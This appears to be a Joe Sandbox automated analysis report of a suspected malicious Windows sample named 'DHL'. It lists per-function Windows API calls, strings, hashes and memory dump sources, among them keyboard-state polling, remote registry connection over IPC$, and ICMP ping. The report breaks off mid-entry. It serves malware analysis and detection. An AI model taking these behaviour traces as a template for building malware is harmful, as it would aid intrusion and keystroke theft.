                                                        • Opcode ID: c7251e7d627676ef1fb3e5cd229e78911f1b4f5b5eb34a6088942280d2615585
                                                        • Instruction ID: 2ca7d57dd6cab3981de5cb3c63e8c3da4a2c34f8efd252d1ffac67ef08249ac1
                                                        • Opcode Fuzzy Hash: c7251e7d627676ef1fb3e5cd229e78911f1b4f5b5eb34a6088942280d2615585
                                                        • Instruction Fuzzy Hash: 3A319072900219AADF21DFA0EC49FEB77BDEF88750F1041A5F509E60A0EB7497858B64
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00A0E6B4
                                                          • Part of subcall function 009BE551: timeGetTime.WINMM(?,?,00A0E6D4), ref: 009BE555
                                                        • Sleep.KERNEL32(0000000A), ref: 00A0E6E1
                                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00A0E705
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A0E727
                                                        • SetActiveWindow.USER32 ref: 00A0E746
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A0E754
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A0E773
                                                        • Sleep.KERNEL32(000000FA), ref: 00A0E77E
                                                        • IsWindow.USER32 ref: 00A0E78A
                                                        • EndDialog.USER32(00000000), ref: 00A0E79B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: eeea7a4655ffc59ffbde5e626fdb1efc0b4b3a9c98c96758bdb08e75749a91d5
                                                        • Instruction ID: 034429e8daf51012ca3e9219827715ec3e30f2942fe62884ef02c77f0695a8e8
                                                        • Opcode Fuzzy Hash: eeea7a4655ffc59ffbde5e626fdb1efc0b4b3a9c98c96758bdb08e75749a91d5
                                                        • Instruction Fuzzy Hash: 9321A571200208AFEB00EFE4FC89B253B69F754759F149835F50A921F1DB72AC52AB24
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A0EA5D
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A0EA73
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A0EA84
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A0EA96
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A0EAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: SendString$_wcslen
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2420728520-1007645807
                                                        • Opcode ID: 6bfd0e80eec90fc54b127106a5fcdea45492d4c74165d148f722628c6b82f654
                                                        • Instruction ID: 3ac2115f1f3ffdf36fcbb2f94cac18e5d48814a6a31fb1b043ac2bec1a60cb88
                                                        • Opcode Fuzzy Hash: 6bfd0e80eec90fc54b127106a5fcdea45492d4c74165d148f722628c6b82f654
                                                        • Instruction Fuzzy Hash: 57115131A5021979D720E7A1DC4AEFF6A7CFBD6F40F4408297811A20D1EEB00915C9F0
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00A05CE2
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A05CFB
                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A05D59
                                                        • GetDlgItem.USER32(?,00000002), ref: 00A05D69
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A05D7B
                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A05DCF
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A05DDD
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A05DEF
                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A05E31
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A05E44
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A05E5A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00A05E67
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: f7f2d2e16fcf5496d88bf648b6d968d5db43aadddcf3b6ba06f210ac202b7389
                                                        • Instruction ID: 0a50f5f31315873ee95aad2c388b58a418c8f9734c1252859057500ed512fcbd
                                                        • Opcode Fuzzy Hash: f7f2d2e16fcf5496d88bf648b6d968d5db43aadddcf3b6ba06f210ac202b7389
                                                        • Instruction Fuzzy Hash: 7151FCB1E00619AFDF18CFA8DD89AAEBBB5EB48310F148129F915E6290D7709E05CF50
                                                        APIs
                                                          • Part of subcall function 009B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009B8BE8,?,00000000,?,?,?,?,009B8BBA,00000000,?), ref: 009B8FC5
                                                        • DestroyWindow.USER32(?), ref: 009B8C81
                                                        • KillTimer.USER32(00000000,?,?,?,?,009B8BBA,00000000,?), ref: 009B8D1B
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 009F6973
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,009B8BBA,00000000,?), ref: 009F69A1
                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,009B8BBA,00000000,?), ref: 009F69B8
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,009B8BBA,00000000), ref: 009F69D4
                                                        • DeleteObject.GDI32(00000000), ref: 009F69E6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 70d6509ab0a2539d09d6db8a2f179224d6a25848773db2b097e3379112fe8bb2
                                                        • Instruction ID: 6bea6f79a076ee02e4e374519059f3fd6fb9d5991c286684c38a263d93f1bf78
                                                        • Opcode Fuzzy Hash: 70d6509ab0a2539d09d6db8a2f179224d6a25848773db2b097e3379112fe8bb2
                                                        • Instruction Fuzzy Hash: FA61BC71101705DFCB25DF68CE49BB67BF9FB48322F148918E1869A960CB75A8C2DB90
                                                        APIs
                                                          • Part of subcall function 009B9944: GetWindowLongW.USER32(?,000000EB), ref: 009B9952
                                                        • GetSysColor.USER32(0000000F), ref: 009B9862
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: c1254ac3077ae7146ccac947258593e9072882d811940dc86347d584da25e503
                                                        • Instruction ID: 94e054659a2c28fb5480fc4e97c1310fa522240b0ef340e82bf959487fc88a3a
                                                        • Opcode Fuzzy Hash: c1254ac3077ae7146ccac947258593e9072882d811940dc86347d584da25e503
                                                        • Instruction Fuzzy Hash: 1241B131114644AFDB219FB89D89BF93BB9EB06330F144619FBA29B2E1D7359C42DB10
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,009EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00A09717
                                                        • LoadStringW.USER32(00000000,?,009EF7F8,00000001), ref: 00A09720
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00A09742
                                                        • LoadStringW.USER32(00000000,?,009EF7F8,00000001), ref: 00A09745
                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00A09866
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 747408836-2268648507
                                                        • Opcode ID: d1022139be46755b70c7676c017f4578e88a40ce1fb18538a43bdde992ad7e80
                                                        • Instruction ID: 30f439c35a77e4865fd8e63845d14477722aec3000b548846c0eab53f30a5eec
                                                        • Opcode Fuzzy Hash: d1022139be46755b70c7676c017f4578e88a40ce1fb18538a43bdde992ad7e80
                                                        • Instruction Fuzzy Hash: F8411E72804219ABCF04EBE0DE46EEEB778AF96340F504465F50572092EF356F49CBA1
                                                        APIs
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A007A2
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A007BE
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A007DA
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A00804
                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A0082C
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A00837
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A0083C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 323675364-22481851
                                                        • Opcode ID: 578fe0d7041d1dfa6dff83dc21c5fefc0223b98e9a4332bb9909f6f3ab16d787
                                                        • Instruction ID: b1d8889453820ea174301042ebe8c39377b12d7c55629432f76d67aa280e4e39
                                                        • Opcode Fuzzy Hash: 578fe0d7041d1dfa6dff83dc21c5fefc0223b98e9a4332bb9909f6f3ab16d787
                                                        • Instruction Fuzzy Hash: 4941E772C10229ABDF15EBA4DC95EEEB778BF45350F444529F901B31A1EB349E04CBA0
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A23C5C
                                                        • CoInitialize.OLE32(00000000), ref: 00A23C8A
                                                        • CoUninitialize.OLE32 ref: 00A23C94
                                                        • _wcslen.LIBCMT ref: 00A23D2D
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00A23DB1
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A23ED5
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A23F0E
                                                        • CoGetObject.OLE32(?,00000000,00A3FB98,?), ref: 00A23F2D
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00A23F40
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A23FC4
                                                        • VariantClear.OLEAUT32(?), ref: 00A23FD8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                        • String ID:
                                                        • API String ID: 429561992-0
                                                        • Opcode ID: 996e01aa564547b0584c3b10fa74ba607060c75c3c1db76c4dc78ed432ac41ed
                                                        • Instruction ID: a41892d16f1726804d91691908c42e2c3ea0477fcb3130cc545ed863d109ceaf
                                                        • Opcode Fuzzy Hash: 996e01aa564547b0584c3b10fa74ba607060c75c3c1db76c4dc78ed432ac41ed
                                                        • Instruction Fuzzy Hash: 98C147726083159FCB00DF68D98492BB7E9FF8A744F10492DF98A9B211D735EE05CB52
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A17AF3
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A17B8F
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00A17BA3
                                                        • CoCreateInstance.OLE32(00A3FD08,00000000,00000001,00A66E6C,?), ref: 00A17BEF
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A17C74
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00A17CCC
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00A17D57
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A17D7A
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00A17D81
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00A17DD6
                                                        • CoUninitialize.OLE32 ref: 00A17DDC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                        • String ID:
                                                        • API String ID: 2762341140-0
                                                        • Opcode ID: 6154eca850ad5f5cf0efcc25706b3ed0e3109e5997a7ff74953a8f5731c67481
                                                        • Instruction ID: 80c2527186fd48e45a811617979258fd5179f8bd0af86e243e0ec658dbbb18e5
                                                        • Opcode Fuzzy Hash: 6154eca850ad5f5cf0efcc25706b3ed0e3109e5997a7ff74953a8f5731c67481
                                                        • Instruction Fuzzy Hash: FEC11C75A04119AFCB14DFA4C884DAEBBF9FF48314B149499F41ADB261D730EE85CB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A35504
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A35515
                                                        • CharNextW.USER32(00000158), ref: 00A35544
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A35585
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A3559B
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A355AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CharNext
                                                        • String ID:
                                                        • API String ID: 1350042424-0
                                                        • Opcode ID: c283489032d617e72904fb0eea9af5553bce31e659e96d9f4a58c1944a44bb9f
                                                        • Instruction ID: 8f5b497eb3ebece8602eabeeb552c9f094c1ffba8edb556e11e03d19f3d90e7f
                                                        • Opcode Fuzzy Hash: c283489032d617e72904fb0eea9af5553bce31e659e96d9f4a58c1944a44bb9f
                                                        • Instruction Fuzzy Hash: 5F618E71D00608AFDF14DFA8CC85AFE7BB9EB09720F108145F925A7291D7749A81DBA0
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009FFAAF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 009FFB08
                                                        • VariantInit.OLEAUT32(?), ref: 009FFB1A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 009FFB3A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 009FFB8D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 009FFBA1
                                                        • VariantClear.OLEAUT32(?), ref: 009FFBB6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 009FFBC3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009FFBCC
                                                        • VariantClear.OLEAUT32(?), ref: 009FFBDE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009FFBE9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 22d8166808d40c29f26e8f6ce2b78531174a79c349de719544b69b0751c5621d
                                                        • Instruction ID: 3684f98fff135e429ed7c63fdff990b0b5e026e8595e89f8bebbc9be3030c7f2
                                                        • Opcode Fuzzy Hash: 22d8166808d40c29f26e8f6ce2b78531174a79c349de719544b69b0751c5621d
                                                        • Instruction Fuzzy Hash: A0414175A0021D9FCB00DFA4DC689BDBBB9EF48355F008065F956A7261DB30E946CB90
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A09CA1
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A09D22
                                                        • GetKeyState.USER32(000000A0), ref: 00A09D3D
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A09D57
                                                        • GetKeyState.USER32(000000A1), ref: 00A09D6C
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A09D84
                                                        • GetKeyState.USER32(00000011), ref: 00A09D96
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A09DAE
                                                        • GetKeyState.USER32(00000012), ref: 00A09DC0
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A09DD8
                                                        • GetKeyState.USER32(0000005B), ref: 00A09DEA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: e65cca4195fa35105f85a046d4a7d28aa2eab22cbc986237095cf1cb9b346dcf
                                                        • Instruction ID: 15367d114fc6f4c2e16b9d7fbc17d22ca00d2620e71998d83506b03a71a8d3ae
                                                        • Opcode Fuzzy Hash: e65cca4195fa35105f85a046d4a7d28aa2eab22cbc986237095cf1cb9b346dcf
                                                        • Instruction Fuzzy Hash: 4D41C6349447CE6DFF319760E8143B7BEA06F11344F08805ADAC6565C3EBA59DC8C7A2
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00A205BC
                                                        • inet_addr.WSOCK32(?), ref: 00A2061C
                                                        • gethostbyname.WSOCK32(?), ref: 00A20628
                                                        • IcmpCreateFile.IPHLPAPI ref: 00A20636
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A206C6
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A206E5
                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00A207B9
                                                        • WSACleanup.WSOCK32 ref: 00A207BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 5a24ba2d7751809b6ec75f34a49407065a753138afc55b6bfb7187aafcc9a254
                                                        • Instruction ID: 8f3806dca9ff316f8c45a2cf6d83f8acd8cc528fabb89ed1cf49344b8835197e
                                                        • Opcode Fuzzy Hash: 5a24ba2d7751809b6ec75f34a49407065a753138afc55b6bfb7187aafcc9a254
                                                        • Instruction Fuzzy Hash: 8B91AC356086119FD320CF19E888F1ABBE1AF84328F1485A9F4699B6A3C770ED41CF91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
